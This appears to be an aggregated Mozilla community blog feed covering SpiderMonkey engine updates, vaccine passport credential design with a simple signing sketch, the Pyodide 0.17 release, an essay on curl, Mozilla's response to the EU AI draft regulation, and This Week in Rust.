SpiderMonkey Development Blog: SpiderMonkey Newsletter 10 (Firefox 88-89)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 88 and 89 Nightly release cycles.

In this newsletter we bid a fond farewell to module owner emeritus Jason Orendorff, and say hello to Jan de Mooij as the new JavaScript Engine module owner.

If you like these newsletters, you may also enjoy Yulia’s Compiler Compiler live stream.

🏆 New contributors

We’d like to thank our new contributors. We are working with Outreachy for the May 2021 cohort, and so have been fortunate enough to have more than the usual number of new contributors.

👷🏽‍♀️ JS features

⚡ WebAssembly

  • We enabled support for large ArrayBuffers and 4 GB Wasm memories in Firefox 89.
  • We enabled support for SIMD on x86 and x64 in Firefox 89.
  • Igalia finished the implementation of the Exception Handling proposal in the Baseline Compiler.
  • We implemented support for arrays and rtt-based downcasting in our Wasm GC prototype.
  • We’ve enabled the Ion backend for ARM64 in Nightly builds.
  • We’ve landed many changes and optimizations for SIMD support.
  • We removed various prefs for features we’ve been shipping for some time.

❇️ Stencil

Stencil is our project to create an explicit interface between the frontend (parser, bytecode emitter) and the rest of the VM, decoupling those components. This lets us improve web-browsing performance, simplify a lot of code and improve bytecode caching.

  • We implemented a mechanism for function delazification information to be merged with the initial stencil before writing to caches.
  • We added support for modules and off-thread compilation to the Stencil API.
  • We optimized use of CompilationState in the parser for certain cases.
  • We added magic values to the Stencil bytecode serialization format to detect corrupt data and handle this more gracefully.
  • We fixed the Stencil bytecode serialization format to deduplicate bytecode.
  • We’re getting closer to sharing Stencil information for self-hosted code across content processes. We expect significant memory usage and performance improvements from this in the coming weeks.

🧹 Garbage Collection

  • We simplified and optimized the WeakMap code a bit.
  • We disabled nursery poisoning for Nightly release builds. The poisoning was pretty expensive and often caused slowdowns compared to release builds that didn’t have the poisoning.
  • We added support for decommitting free arenas on Apple’s M1 hardware. This required some changes due to the 16 KB page size.
  • We changed the pre-write barrier to use a buffering mechanism instead of marking directly.
  • GC markers now describe what they are, hopefully reducing confusion over whether the browser is paused throughout a major GC.

🚀 JIT

  • We changed how arguments objects are optimized. Instead of doing an (expensive) analysis for all functions that use arguments, we now use Scalar Replacement in the Warp backend to optimize away arguments allocations. The new implementation is simpler, more self-contained, and lets us avoid doing the analysis for cold functions.
  • We fixed the Scalar Replacement code for arrays and objects to work with Warp.
  • We also added back support for branch pruning with Warp.
  • We added CacheIR support for optimizing GetElem, SetElem and in operations with null or undefined property keys. This turned out to be very common on certain websites.
  • We optimized DOM getters for window.foo (WindowProxy objects).
  • We improved function inlining in Warp for certain self-hosted functions (for example Array.prototype.map) that benefit from inlining.
  • We added a browser pref to control the function inlining size threshold, to help us investigate performance issues.

📐 ReShape

Now that Warp is on by default and we’ve removed the old backend and Type Inference mechanism, we’re able to optimize our object representation more. Modern websites spend a significant amount of time doing property lookups, and property information takes up a lot of space, so we expect improvements in this area to pay off.

  • We’ve merged ObjectGroup (used by the old Type Inference system) into Shape and BaseShape. This removed a word from every JS object and is also simpler.
  • We cleaned up and deduplicated our property lookup code.
  • We’ve replaced the old JSGetterOp and JSSetterOp getters/setters with a property attribute.
  • We changed our implementation of getter/setter properties: instead of storing the getter and setter objects in the shape tree, we now store them in object slots. This fixes some performance cliffs and unblocks future Shape changes.
  • We’ve started adding better abstractions for property information stored in shapes. This will make it easier to experiment with different representations in the coming weeks.

🛠 Testing

  • We made SpiderMonkey’s test suites on Android about four times faster by optimizing the test runner, copying fewer files to the device, and reducing the number of jit-test configurations.
  • We removed the Rust API crates because upstream Servo uses its own version instead of the one we maintained in-tree.
  • We landed support for the Fuzzilli JS engine fuzzer in the JS shell.

📚 Miscellaneous

  • We cleaned up the lexical environment class hierarchy.
  • We optimized Object.assign. Modern JS frameworks use this function a lot.
  • The bytecode emitter now emits optimized bytecode for name lookups in strict-mode eval.
  • We updated irregexp to the latest upstream version.
  • We optimized checks for strings representing an index by adding a flag for this to atoms.
  • Function delazification is now properly reported in the profiler.
  • The profiler reports more useful stacks for JS code because it’s now able to retrieve registers from the JIT trampoline to resume stack walking.
  • We added memory reporting for external ArrayBuffer memory and also reduced heap-unclassified memory by adding some new memory reporters.
  • We added documentation for the LifoAlloc allocator.
  • We fixed Clang static analysis and formatting issues in the Wasm code.
  • We’ve started cleaning up PropertyDescriptor by using Maybe<PropertyDescriptor>.

The Mozilla Blog: Notes on Implementing Vaccine Passports

Now that we’re starting to get widespread COVID vaccination, “vaccine passports” have started to become more relevant. The idea behind a vaccine passport is that you would have some kind of credential that you could use to prove that you had been vaccinated against COVID; various entities (airlines, clubs, employers, etc.) might require such a passport as proof of vaccination. Right now deployment of this kind of mechanism is fairly limited: Israel has one called the green pass and the State of New York is using something called the Excelsior Pass based on some IBM tech.

Like just about everything surrounding COVID, there has been a huge amount of controversy around vaccine passports (see, for instance, this EFF post, ACLU post, or this NYT article).

There seem to be four major sets of complaints:

  1. Requiring vaccination is inherently a threat to people’s freedom.
  2. Because vaccine distribution has been unfair, with a number of communities having trouble getting vaccines, a requirement to get vaccinated increases inequity and vaccine passports enable that.
  3. Vaccine passports might be implemented in a way that is inaccessible for people without access to technology (especially to smartphones).
  4. Vaccine passports might be implemented in a way that is a threat to user privacy and security.

I don’t have anything particularly new to say about the first two questions, which aren’t really about technology but rather about ethics and political science, so I don’t think it’s that helpful to weigh in on them, except to observe that vaccination requirements are nothing new: it’s routine to require children to be vaccinated to go to school, people to be vaccinated to enter certain countries, etc. That isn’t to say that this practice is without problems but merely that it’s already quite widespread, so we have a bunch of prior art here. On the other hand, the questions of how to design a vaccine passport system are squarely technical; the rest of this post will be about that.

What are we trying to accomplish?

As usual, we want to start by asking what we’re trying to accomplish. At a high level, we have a system in which a vaccinated person (VP) needs to demonstrate to some entity (the Relying Party (RP)) that they have been vaccinated within some relevant time period. This brings with it some security requirements:

  1. Unforgeability: It should not be possible for an unvaccinated person to persuade the RP that they have been vaccinated.
  2. Information minimization: The RP should learn as little as possible about the VP, consistent with unforgeability.
  3. Untraceability: Nobody but the VP and RP should know which RPs the VP has proven their status to.

I want to note at this point that there has been a huge amount of emphasis on the unforgeability property, but it’s fairly unclear — at least to me — how important it really is. We’ve had trivially forgeable paper-based vaccination records for years and I’m not aware of any evidence of widespread fraud. However, this seems to be something people are really concerned about — perhaps due to how polarized the questions of vaccination and masks have become — and we have already heard some reports of sales of fake vaccine cards, so perhaps we really do need to worry about cheating. It’s certainly true that people are talking about requiring proof of COVID vaccination in many more settings than, for instance, proof of measles vaccination, so there is somewhat more incentive to cheat. In any case, the privacy requirements are a real concern.

In addition, we have some functional requirements/desiderata:

  1. The system should be cheap to bring up and operate.
  2. It should be easy for VPs to get whatever credential they need and to replace it if it is lost or destroyed.
  3. VPs should not be required to have some sort of device (e.g., a smartphone).

The Current State

In the US, most people who are getting vaccinated are getting paper vaccination cards that look like this:

COVID Vaccination Card

This card is a useful record that you’ve been vaccinated, with which vaccine, and when you have to come back, but it’s also trivially forgeable. Given that they’re made of paper with effectively no anti-counterfeiting measures (not even the ones that are in currency), it would be easy to make one yourself, and there are already people selling them online. As I said above, it’s not clear entirely how much we ought to worry about fraud, but if we do, these cards aren’t up to the task. In any case, they also have suboptimal information minimization properties: it’s not necessary to know how old you are or which vaccine you got in order to know whether you were vaccinated.

The cards are pretty good on the traceability front: nobody but you and the RP learns anything, and they’re cheap to make and use, without requiring any kind of device on the user’s side. They’re not that convenient if you lose them, but given how cheap they are to make, it’s not the worst thing in the world if the place you got vaccinated has to mail you a new one.

Improving The Situation

A good place to start is to ask how to improve the paper design to address the concerns above.

The data minimization issue is actually fairly easy to address: just don’t put unnecessary information on the card. As I said, there’s no reason to have your DOB or the vaccine type on the piece of paper you use for proof.

However, it’s actually not straightforward to remove your name. The reason for this is that the RP needs to be able to determine that the credential actually applies to you rather than to someone else. Even if we assume that the credential is tamper-resistant (see below), that doesn’t mean it belongs to you. There are really two main ways to address this:

  1. Have the VP’s name (or some ID number) on the credential and require them to provide a biometric credential (i.e., a photo ID) that proves they are the right person.
  2. Embed a biometric directly into the credential.

This should all be fairly familiar because it’s exactly the same as other situations where you prove your identity. For instance, when you get on a plane, TSA or the airline reads your boarding pass, which has your name, and then uses your photo ID to compare that to your face and decide if it’s really you (this is option 1). By contrast, when you want to prove you are licensed to drive, you present a credential that has your biometrics directly embedded (i.e., a drivers license).

This leaves us with the question of how to make the credential tamper-resistant. There are two major approaches here:

  1. Make the credential physically tamper-resistant
  2. Make the credential digitally tamper-resistant

Physically Tamper-Resistant Credentials

A physically tamper-resistant credential is just one which is hard to change or for unauthorized people to manufacture. This usually includes features like holograms, tamper-evident sealing (so that you can’t disassemble it without leaving traces), etc. Most of us have a lot of experience with physically tamper-resistant credentials such as passports, drivers licenses, etc. These generally aren’t completely impossible to forge, but they’re designed to be somewhat difficult. From a threat model perspective, this is probably fine; after all, we’re not trying to make it impossible to pretend to be vaccinated, just difficult enough that most people won’t try.

In principle, this kind of credential has excellent privacy because it’s read by a human RP rather than some machine. Of course, one could take a photo of it, but there’s no need to. As an analogy, if you go to a bar and show your driver’s license to prove you are over 21, that doesn’t necessarily create a digital record. Unfortunately for privacy, increasingly those kinds of previously analog admissions processes are actually done by scanning the credential (which usually has some machine readable data), thus significantly reducing the privacy benefit.

The main problem with a physically tamper-resistant credential is that it’s expensive to make and that by necessity you need to limit the number of people who can make it: if it’s cheap to buy the equipment to make the credential then it will also be cheap to forge. This is inconsistent with rapidly issuing credentials concurrently with vaccinating people: when I got vaccinated there were probably 25 staff checking people in and each one had a stack of cards. It’s hard to see how you would scale the production of tamper-resistant plastic cards to an operation like this, let alone to one that happens at doctors offices and pharmacies all over the country. It’s potentially possible that they could report people’s names to some central authority which then makes the cards, but even then we have scaling issues, especially if you want the cards to be available 2 weeks after vaccination. A related problem is that if you lose the card, it’s hard to replace because you have the same issuing problem.[1]

Digitally Tamper-Resistant Credentials

The major alternative here is to design a digitally tamper-resistant system. Effectively what this means is that the issuing authority digitally signs a credential. This provides cryptographically strong authentication of the data in the credential in such a way that anyone can verify it as long as they have the right software. The credential just needs to contain the same information as would be on the paper credential: the fact that you were vaccinated (and potentially a validity date) plus either your name (so you can show your photo id) or your identity (so the RP can directly match it against you).

This design has a number of nice properties. First, it’s cheap to manufacture: you can do the signing on a smartphone app.[2] It doesn’t need any special machinery from the RP: you can encode the credential as a 2-D bar code which the VP can show on their phone or print out. And they can make as many copies as they want, just like your airline boarding pass.

The major drawback of this design is that it requires special software on the RP side to read the 2D bar code, verify the digital signature, and verify the result. However, this software is relatively straightforward to write and can run on any smartphone, using the camera to read the bar code.[3] So, while this is somewhat of a pain, it’s not that big a deal.

This design also has generally good privacy properties: the information encoded in the credential is (or at least can be) the minimal set needed to validate that you are you and that you are vaccinated, and because the credential can be locally verified, there’s no central authority which learns where you go. Or, at least, it’s not necessary for there to be a central authority: nothing stops the RP from reporting that you were present back to some central location, but that’s just inherent in them getting your name and picture. As far as I know, there’s no way to prevent that, though if the credential just contains your picture rather than an identifier, it’s somewhat better (though the code itself is still unique, so you can be tracked), especially because the RP can always capture your picture anyway.[4]
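As a concrete (and heavily simplified) sketch of the signed-credential idea, the following Python issues and verifies a credential token of the kind that could be encoded in a 2-D bar code. A real deployment would use an asymmetric signature scheme (e.g. Ed25519), so that relying parties only need the issuer’s public key; the stdlib HMAC here is merely a stand-in, and the issuer key and field names are hypothetical:

```python
import base64
import hashlib
import hmac
import json

# Hypothetical issuer key. With a real asymmetric scheme, the issuer would
# hold a private signing key and verifiers would hold only the public key.
ISSUER_KEY = b"issuer-secret-key"

def issue_credential(name, vaccinated, valid_until):
    # Canonicalize the minimal payload, then sign it.
    payload = json.dumps(
        {"name": name, "vaccinated": vaccinated, "valid_until": valid_until},
        sort_keys=True,
    ).encode()
    sig = hmac.new(ISSUER_KEY, payload, hashlib.sha256).digest()
    # The resulting token is what would go into the 2-D bar code.
    return base64.b64encode(payload).decode() + "." + base64.b64encode(sig).decode()

def verify_credential(token):
    payload_b64, sig_b64 = token.split(".")
    payload = base64.b64decode(payload_b64)
    expected = hmac.new(ISSUER_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(base64.b64decode(sig_b64), expected):
        return None  # signature mismatch: forged or corrupted credential
    return json.loads(payload)

token = issue_credential("Alice Example", True, "2021-10-01")
assert verify_credential(token)["vaccinated"] is True

# Tampering with the payload invalidates the signature:
_, sig_part = token.split(".")
forged = base64.b64encode(b'{"name": "Eve"}').decode() + "." + sig_part
assert verify_credential(forged) is None
```

Note that verification here is entirely local: the RP needs the issuer’s key and the verification code, but no network round trip, which is what makes the untraceability property achievable.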

By this point you should be getting the impression that signed credentials are a pretty good design, and it’s no surprise that this seems to be the design that WHO has in mind for their smart vaccination certificate. They seem to envision encoding quite a bit more information than is strictly required for a “yes/no” decision and then having a “selective disclosure” feature that would just have that information and can be encoded in a bar code.

What about Green Pass, Excelsior Pass, etc?

So what are people actually rolling out in the field? The Israeli Green Pass seems to be basically this: a signed credential. It’s got a QR code which you read with an app, and the app then displays the ID number and an expiration date. You then compare the ID number to the user’s ID to verify that they are the right person.

I’ve had a lot of trouble figuring out what the Excelsior Pass does. Based on the NY Excelsior Pass FAQ, which says that “you can print a paper Pass, take a screen shot of your Pass, or save it to the Excelsior Pass Wallet mobile app”, it sounds like it’s the same kind of thing as Green Pass, but that’s hardly definitive. I’ve been trying to get a copy of the specification for this technology and will report back if I manage to learn more.

What About the Blockchain?

Something that keeps coming up here is the use of blockchain for vaccine passports. You’ll notice that my description above doesn’t have anything about the blockchain but, for instance, the Excelsior Pass says it is built on IBM’s digital health pass which is apparently “built on IBM blockchain technology” and says “Protects user data so that it remains private when generating credentials. Blockchain and cryptography provide credentials that are tamper-proof and trusted.” As another example, in this webinar on the Linux Foundation’s COVID-19 Credentials Initiative, Kaliya Young answers a question on blockchain by saying that the root keys for the signers would be stored in the blockchain.

To be honest, I find this all kind of puzzling; as far as I can tell there’s no useful role for the blockchain here. To oversimplify, the major purpose of a blockchain is to arrange for global consensus about some set of facts (for instance, the set of financial transactions that has happened) but that’s not necessary in this case: the structure of a vaccine credential is that some health authority asserts that a given person has been vaccinated. We do need relying parties to know the set of health authorities, but we have existing solutions for that (at a high level, you just build the root keys into the verifying apps).[5] If anyone has more details on why a blockchain[6] is useful for this application I’d be interested in hearing them.
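To illustrate the point about building root keys into the verifying apps, here is a minimal Python sketch of a verifier that ships with a fixed table of trusted health-authority keys and rejects everything else, with no blockchain involved. The authority names and keys are hypothetical, and HMAC again stands in for a real asymmetric signature:

```python
import hashlib
import hmac

# Hypothetical trust anchors baked into the verifying app, analogous to the
# root certificates shipped with browsers.
TRUSTED_AUTHORITIES = {
    "health-authority-a": b"key-a",
    "health-authority-b": b"key-b",
}

def verify(authority, payload, sig):
    key = TRUSTED_AUTHORITIES.get(authority)
    if key is None:
        return False  # unknown issuer: no trust anchor, reject
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    return hmac.compare_digest(sig, expected)

payload = b"vaccinated=yes"
sig = hmac.new(b"key-a", payload, hashlib.sha256).digest()
assert verify("health-authority-a", payload, sig)      # trusted issuer
assert not verify("unknown-authority", payload, sig)   # not in the table
assert not verify("health-authority-b", payload, sig)  # wrong issuer's key
```

The consensus problem a blockchain solves simply doesn’t arise here: the set of trusted authorities is small, changes rarely, and can be distributed with app updates.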

Is this stuff any good?

It’s hard to tell. As discussed above, some of these designs seem to be superficially sensible, but even if the overall design is sensible, there are lots of ways to implement it incorrectly. It’s quite concerning not to have published specifications for the exact structure of the credentials. Without a detailed specification, it’s not possible to determine that a system has the claimed security and privacy properties. The protocols that run the Web and the Internet are open, which not only allows anyone to implement them, but also to verify their security and privacy properties. If we’re going to have vaccine passports, they should be open as well.

Updated: 2021-04-02 10:10 AM to point to Mozilla’s previous work on blockchain and identity.

  1. Of course, you could be issued multiple cards, as they’re not transferable. ↩︎
  2. There are some logistical issues around exactly who can sign: you probably don’t want everyone at the clinic to have a signing key, but you can have some central signer. ↩︎
  3. Indeed, in Santa Clara County, where I got vaccinated, your appointment confirmation is a 2D bar code which you print out and they scan onsite. ↩︎
  4. If you’re familiar with TLS, this is going to sound a lot like a digital certificate, and you might wonder whether revocation is a privacy issue the way that it is with WebPKI and OCSP. The answer is more or less “no”. There’s no real reason to revoke individual credentials and so the only real problem is revoking signing certificates. That’s likely to happen quite infrequently, so we can either ignore it, disseminate a certificate revocation list, or have central status checking just for them. ↩︎
  5. Obviously, you won’t be signing every credential with the root keys, but you use those to sign some other keys, building a chain of trust down to keys which you can use to sign the user credentials. ↩︎
  6. Because of the large amount of interest in blockchain technologies, there’s a tendency to try to sprinkle it in places it doesn’t help, especially in the identity space. For that reason, it’s really important to ask what benefits it’s bringing. ↩︎

The post Notes on Implementing Vaccine Passports appeared first on The Mozilla Blog.

Hacks.Mozilla.Org: Pyodide Spin Out and 0.17 Release

We are happy to announce that Pyodide has become an independent and community-driven project. We are also pleased to announce the 0.17 release for Pyodide with many new features and improvements.

Pyodide consists of the CPython 3.8 interpreter compiled to WebAssembly, which allows Python to run in the browser. Many popular scientific Python packages have also been compiled and made available. In addition, Pyodide can install any Python package with a pure Python wheel from the Python Package Index (PyPI). Pyodide also includes a comprehensive foreign function interface which exposes the ecosystem of Python packages to Javascript and the browser user interface, including the DOM, to Python.

You can try out the latest version of Pyodide in a REPL directly in your browser.

Pyodide is now an independent project

We are happy to announce that Pyodide now has a new home in a separate GitHub organisation (github.com/pyodide) and is maintained by a volunteer team of contributors. The project documentation is available on pyodide.org.

Pyodide was originally developed inside Mozilla to allow the use of Python in Iodide, an experimental effort to build an interactive scientific computing environment for the web.  Since its initial release and announcement, Pyodide has attracted a large amount of interest from the community, remains actively developed, and is used in many projects outside of Mozilla.

The core team has approved a transparent governance document  and has a roadmap for future developments. Pyodide also has a Code of Conduct which we expect all contributors and core members to adhere to.

New contributors are welcome to participate in the project development on GitHub. There are many ways to contribute, including code contributions, documentation improvements, adding packages, and using Pyodide for your applications and providing feedback.

The Pyodide 0.17 release

Pyodide 0.17.0 is a major step forward from previous versions. It includes:

  • major maintenance improvements,
  • a thorough redesign of the central APIs, and
  • careful elimination of error leaks and memory leaks

Type translation improvements

The type translations module was significantly reworked in v0.17 with the goal that round-trip translations of objects between Python and Javascript produce an identical object.

In other words, Python -> JS -> Python translation and JS -> Python -> JS translation now produce objects that are equal to the original object. (A couple of exceptions to this remain due to unavoidable design tradeoffs.)

One of Pyodide’s strengths is the foreign function interface between Python and Javascript, which at its best can practically erase the mental overhead of working with two different languages. All I/O must pass through the usual web APIs, so in order for Python code to take advantage of the browser’s strengths, we need to be able to support use cases like generating image data in Python and rendering the data to an HTML5 Canvas, or implementing event handlers in Python.

In the past we found that one of the major pain points in using Pyodide occurs when an object makes a round trip from Python to Javascript and back to Python and comes back different. This violated the expectations of the user and forced inelegant workarounds.

The issues with round trip translations were primarily caused by implicit conversion of Python types to Javascript. The implicit conversions were intended to be convenient, but the system was inflexible and surprising to users. We still implicitly convert strings, numbers, booleans, and None. Most other objects are shared between languages using proxies that allow methods and some operations to be called on the object from the other language. The proxies can be converted to native types with new explicit converter methods called .toJs and to_py.

For instance, given an Array in JavaScript,

window.x = ["a", "b", "c"];

We can access it in Python as,

>>> from js import x # import x from global Javascript scope
>>> type(x)
<class 'JsProxy'>
>>> x[0]    # can index x directly
'a'
>>> x[1] = 'c' # modify x
>>> x.to_py()   # convert x to a Python list
['a', 'c', 'c']

Several other conversion methods have been added for more complicated use cases. This gives the user much finer control over type conversions than was previously possible.

For example, suppose we have a Python list and want to use it as an argument to a Javascript function that expects an Array.  Either the caller or the callee needs to take care of the conversion. This allows us to directly call functions that are unaware of Pyodide.

Here is an example of calling a Javascript function from Python with argument conversion on the Python side:

function jsfunc(array) {
  return array.length;
}
from js import jsfunc
from pyodide import to_js

def pyfunc():
    mylist = [1, 2, 3]
    jslist = to_js(mylist)
    return jsfunc(jslist) # returns 3

This would work well in the case that jsfunc is a Javascript built-in and pyfunc is part of our codebase. If pyfunc is part of a Python package, we can handle the conversion in Javascript instead:

function jsfunc(pylist) {
  let array = pylist.toJs();
  return array.length;
}

See the type translation documentation for more information.

Asyncio support

Another major new feature is the implementation of a Python event loop that schedules coroutines to run on the browser event loop. This makes it possible to use asyncio in Pyodide.

Additionally, it is now possible to await Javascript Promises in Python and to await Python awaitables in Javascript. This allows for seamless interoperability between asyncio in Python and Javascript (though memory management issues may arise in complex use cases).

Here is an example where we define a Python async function that awaits the Javascript async function “fetch” and then we await the Python async function from Javascript.

async def test():
    from js import fetch
    # Fetch the Pyodide packages list
    r = await fetch("packages.json")
    data = await r.json()
    # return all available packages
    return data.dependencies.object_keys()

let test = pyodide.globals.get("test");

// we can await the test() coroutine from Javascript
result = await test();
// logs ["asciitree", "parso", "scikit-learn", ...]

Error Handling

Errors can now be thrown in Python and caught in Javascript or thrown in Javascript and caught in Python. Support for this is integrated at the lowest level, so calls between Javascript and C functions behave as expected. The error translation code is generated by C macros which makes implementing and debugging new logic dramatically simpler.

For example:

function jserror() {
  throw new Error("ooops!");
}

from js import jserror
from pyodide import JsException

try:
    jserror()
except JsException as e:
    print(str(e)) # prints "Error: ooops!"

Emscripten update

Pyodide uses the Emscripten compiler toolchain to compile the CPython 3.8 interpreter and Python packages with C extensions to WebAssembly. In this release we finally completed the migration to the latest version of Emscripten that uses the upstream LLVM backend. This allows us to take advantage of recent improvements to the toolchain, including significant reductions in package size and execution time.

For instance, the SciPy package shrank dramatically from 92 MB to 15 MB, so SciPy is now cached by browsers. This greatly improves the usability of scientific Python packages that depend on SciPy, such as scikit-image and scikit-learn. The size of the base Pyodide environment with only the CPython standard library shrank from 8.1 MB to 6.4 MB.

On the performance side, the latest toolchain comes with a 25% to 30% run time improvement. Performance ranges from near-native to 3 to 5 times slower, depending on the benchmark. These benchmarks were created with Firefox 87.

Other changes

Other notable features include:

  • Fixed package loading for Safari v14+ and other Webkit-based browsers
  • Added support for relative URLs in micropip and loadPackage, and improved interaction between micropip and loadPackage
  • Support for implementing Python modules in Javascript

We also did a large amount of maintenance work and code quality improvements:

  • Lots of bug fixes
  • Upstreamed a number of patches to the emscripten compiler toolchain
  • Added systematic error handling to the C code, including automatic adaptors between Javascript errors and CPython errors
  • Added internal consistency checks to detect memory leaks, detect fatal errors, and improve ease of debugging

See the changelog for more details.

Winding down Iodide

Mozilla has made the difficult decision to wind down the Iodide project. While alpha.iodide.io will continue to be available for now (in part to provide a demonstration of Pyodide’s capabilities), we do not recommend using it for important work as it may shut down in the future. Since Iodide’s release, there have been many efforts at creating interactive notebook environments based on Pyodide which are in active development and offer a similar environment for creating interactive visualizations in the browser using Python.

Next steps for Pyodide

While many issues were addressed in this release, a number of other major steps remain on the roadmap. We can mention:

  • Reducing download sizes and initialization times
  • Improving the performance of Python code in Pyodide
  • Simplifying the package loading system
  • Updating SciPy to a more recent version
  • Improving project sustainability, for instance by seeking synergies with the conda-forge project and its tooling
  • Better support for web workers
  • Better support for synchronous IO (popular for programming education)

For additional information see the project roadmap.


Lots of thanks to:

  • Dexter Chua and Joe Marshall for improving the build setup and making Emscripten migration possible.
  • Hood Chatham for in-depth improvement of the type translation module and adding asyncio support
  • and Romain Casati for improving the Pyodide REPL console.

We are also grateful to all Pyodide contributors.

The post Pyodide Spin Out and 0.17 Release appeared first on Mozilla Hacks - the Web developer blog.

Daniel Stenberg“So what exactly is curl?”

You know that question you can get asked casually by a person you’ve never met before or even by someone you’ve known for a long time but haven’t really talked to about this before. Perhaps at a social event. Perhaps at a family dinner.

– So what do you do?

The implication is of course what you work with. Or as. Perhaps a title.

Software Engineer

In my case I typically start out by saying I’m a software engineer. (And no, I don’t use a title.)

If the person who asked the question is a non-techie, this can then take off in basically any direction: from questions about the Internet, to how their printer acts up sometimes, to finicky details about Wi-Fi installations or their parents’ problems installing anti-virus. In other words: into areas that have virtually nothing to do with software engineering but are related to computers.

If the person is somewhat knowledgeable or interested in technology or computers they know both what software and engineering are. Then the question can get deepened.

What kind of software?

Alternatively they ask for what company I work for, but it usually ends up on the same point anyway, just via this extra step.

I work on curl. (Saying I work for wolfSSL rarely helps.)

<figcaption>Business cards of mine</figcaption>

So what is curl?

curl is a command line tool used by a small set of people (possibly several thousands or even millions), and the library libcurl that is installed in billions of places.

I often try to compare libcurl with how companies build for example cars out of many components from different manufacturers and companies. They use different pieces from many separate sources put together into a single machine to produce the end product.

libcurl is like one of those little components that a car manufacturer needs. It isn’t the only choice, but it is a well known, well tested and familiar one. It’s a safe choice.

Internet what?

I’ve realized that lots of people, even many with experience, knowledge or jobs in the IT industry, don’t know what an Internet transfer is. Describing curl as doing such transfers doesn’t really help in those cases.

An internet transfer is the bridge between “the cloud” and your devices or applications. curl is a bridge.

Everything wants Internet these days

In general, anything today that has power goes towards becoming networked. Everything that can, will connect to the Internet sooner or later. Maybe not always because it’s a good idea, but because it gives your thing a (perceived) advantage over your competitors.

Things that a while ago you wouldn’t dream would do that now do Internet transfers. Toothbrushes, ovens, washing machines and so on.

If you want to build a new device or application today and you want it to be successful and more popular than your competitors, you will probably have to make it Internet-connected.

You need a “bridge”.

Making things today is like doing a puzzle

Everyone who makes devices or applications today has a wide variety of different components and pieces of the big “puzzle” to select from.

You can opt to write many pieces yourself, but virtually nobody today creates anything digital entirely on their own. We lean on others. We stand on others’ shoulders. In particular, open source software has grown up to provide a vast ocean of puzzle pieces to use and leverage.

One of the little pieces in your device puzzle is probably Internet transfers, because you want your thing to get updates, upload telemetry and who knows what else.

The picture then needs a piece inserted in the right spot to be complete. The Internet transfers piece. That piece can be curl. We’ve made curl to be a good such piece.

<figcaption>This perfect picture is just missing one little piece…</figcaption>

Relying on pieces provided by others

Lots have been said about the fact that companies, organizations and entire ecosystems rely on pieces and components written, maintained and provided by someone else. Some of them are open source components written by developers in their spare time, yet used by thousands of companies shipping commercial products.

curl is one such component. It’s not “just” a spare time project anymore of course, but the point remains. We estimate that curl runs in some ten billion installations these days, so quite a lot of current Internet infrastructure uses our little puzzle piece in their pictures.

<figcaption>Modified version of the original xkcd 2347 comic</figcaption>

So you’re rich

I rarely get to this point in any conversation because I would have already bored my company into a coma by now.

The concept of giving away a component like this as open source under a liberal license is a very weird one to most people. Maybe also because I say that I work on this and I created it. But I’m not at all the only contributor, and we wouldn’t have gotten to this point without the help of several hundred other developers.

“- No, I give it away for free. Yes really, entirely and totally free for anyone and everyone to use. Correct, even the largest and richest mega-corporations of the world.”

The ten billion installations work as marketing: they get companies to understand that curl is a solid puzzle piece, so more will use it, and some of those will end up discovering they need help or assistance and purchase support for curl from me!

I’m not rich, but I do perfectly fine. I consider myself very lucky and fortunate to get to work on curl for a living.

A curl world

There are about 5 billion Internet-using humans in the world. There are about 10 billion curl installations.

The puzzle piece curl is there in the middle.

This is how they’re connected. This is the curl world map 2021.

Or put briefly

libcurl is a library for doing transfers specified with a URL, using one of the supported protocols. It is fast, reliable, very portable, well documented and feature rich. A de-facto standard API available for everyone.


The original island image is by Julius Silver from Pixabay. xkcd strip edits were done by @tsjost.

Mozilla Privacy BlogMozilla reacts to publication of EU’s draft regulation on AI

Today, the European Commission published its draft for a regulatory framework for artificial intelligence (AI). The proposal lays out comprehensive new rules for AI systems deployed in the EU. Mozilla welcomes the initiative to rein in the potential harms caused by AI, but much remains to be clarified.

Reacting to the European Commission’s proposal, Raegan MacDonald, Mozilla’s Director of Global Public Policy, said: 

“AI is a transformational technology that has the potential to create value and enable progress in so many ways, but we cannot lose sight of the real harms that can come if we fail to protect the rights and safety of people living in the EU. Mozilla is committed to ensuring that AI is trustworthy, that it helps people instead of harming them. The European Commission’s push to set ground rules is a step in the right direction and it is good to see that several of our recommendations to the Commission are reflected in the proposal – but there is more work to be done to ensure these principles can be meaningfully implemented, as some of the safeguards and red lines envisioned in the text leave a lot to be desired.

Systemic transparency is a critical enabler of accountability, which is crucial to advancing more trustworthy AI. We are therefore encouraged by the introduction of user-facing transparency obligations – for example for chatbots or so-called deepfakes – as well as a public register for high-risk AI systems in the European Commission’s proposal. But as always, details matter, and it will be important what information exactly this database will encompass. We look forward to contributing to this important debate.”


The post Mozilla reacts to publication of EU’s draft regulation on AI appeared first on Open Policy & Advocacy.

Cameron KaiserColoured iMacs? We got your coloured iMacs right here

And you don't even need to wait until May. Besides being the best colour Apple ever offered (a tray-loading Strawberry, which is nicer than the current M1 iMac Pink), this iMac G3 also has a 600MHz Sonnet HARMONi in it, so it has a faster CPU and FireWire too. Take that, non-upgradable Apple Silicon. It runs Jaguar with OmniWeb and Crypto Ancienne for web browsing.

Plus, these coloured iMacs can build and run TenFourFox: Chris T proved it on his 400MHz G3. It took 34 hours to compile from source. I always did like slow-cooked meals better.

This Week In RustThis Week in Rust 387

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

No papers/research projects this week.

Project/Tooling Updates
Rust Walkthroughs

Crate of the Week

This week's crate is deltoid, another crate for delta-compressing Rust data structures.

Thanks to Joey Ezechiëls for the nomination

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No calls for participation this week

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

292 pull requests were merged in the last week

Rust Compiler Performance Triage

Another quiet week with very small changes to compiler performance.

Triage done by @rylev. Revision range: 5258a74..6df26f

1 Regression, 0 Improvements, 1 Mixed

Approved RFCs
